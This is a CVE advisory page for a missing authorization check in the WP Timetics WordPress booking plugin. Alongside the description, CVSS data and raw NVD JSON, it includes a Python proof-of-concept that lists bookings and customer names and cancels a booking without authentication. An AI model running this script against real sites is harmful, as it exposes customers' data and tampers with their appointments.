Security Vulnerability Report
CVE-2025-5919 CVSS 6.5 MEDIUM

CVE-2025-5919

Published: 2026-01-06 09:15:55
Last Modified: 2026-04-15 00:35:42

Description

The Appointment Booking and Scheduling Calendar Plugin – WP Timetics plugin for WordPress is vulnerable to unauthorized access and modification of data due to a missing capability check on the update and register_routes functions in all versions up to, and including, 1.0.36. This makes it possible for unauthenticated attackers to view and modify booking details.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

All versions of the Timetics plugin <= 1.0.36

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target WordPress site with vulnerable Timetics plugin
target = "http://target-wordpress-site.com"

# 1. Unauthenticated enumeration of bookings
print("[*] Enumerating bookings without authentication...")
response = requests.get(f"{target}/wp-json/timetics/v1/bookings")
if response.status_code == 200:
    bookings = response.json()
    print(f"[+] Found {len(bookings)} bookings:")
    for booking in bookings:
        print(f"  - Booking ID: {booking.get('id')}, Customer: {booking.get('customer_name')}")

# 2. Update booking details without authentication
print("\n[*] Attempting to modify booking...")
malicious_data = {
    "id": 1,
    "status": "cancelled",
    "notes": "Modified by unauthorized attacker"
}
update_response = requests.post(
    f"{target}/wp-json/timetics/v1/bookings/update",
    json=malicious_data
)
if update_response.status_code in [200, 201]:
    print("[+] Booking successfully modified without authentication!")
else:
    print(f"[-] Update failed with status: {update_response.status_code}")
```

References

https://plugins.trac.wordpress.org/browser/timetics/tags/1.0.36/core/bookings/api-booking.php#L56
https://plugins.trac.wordpress.org/browser/timetics/tags/1.0.36/core/bookings/booking.php#L592
https://www.wordfence.com/threat-intel/vulnerabilities/id/d8d50b65-7479-4140-9231-c06c18d8be8f?source=cve

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-5919", "sourceIdentifier": "[email protected]", "published": "2026-01-06T09:15:54.670", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Appointment Booking and Scheduling Calendar Plugin – WP Timetics plugin for WordPress is vulnerable to unauthorized access and modification of data due to a missing capability check on the update and register_routes functions in all versions up to, and including, 1.0.36. This makes it possible for unauthenticated attackers to view and modify booking details."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/timetics/tags/1.0.36/core/bookings/api-booking.php#L56", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/timetics/tags/1.0.36/core/bookings/booking.php#L592", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d8d50b65-7479-4140-9231-c06c18d8be8f?source=cve", "source": "[email protected]"}]}}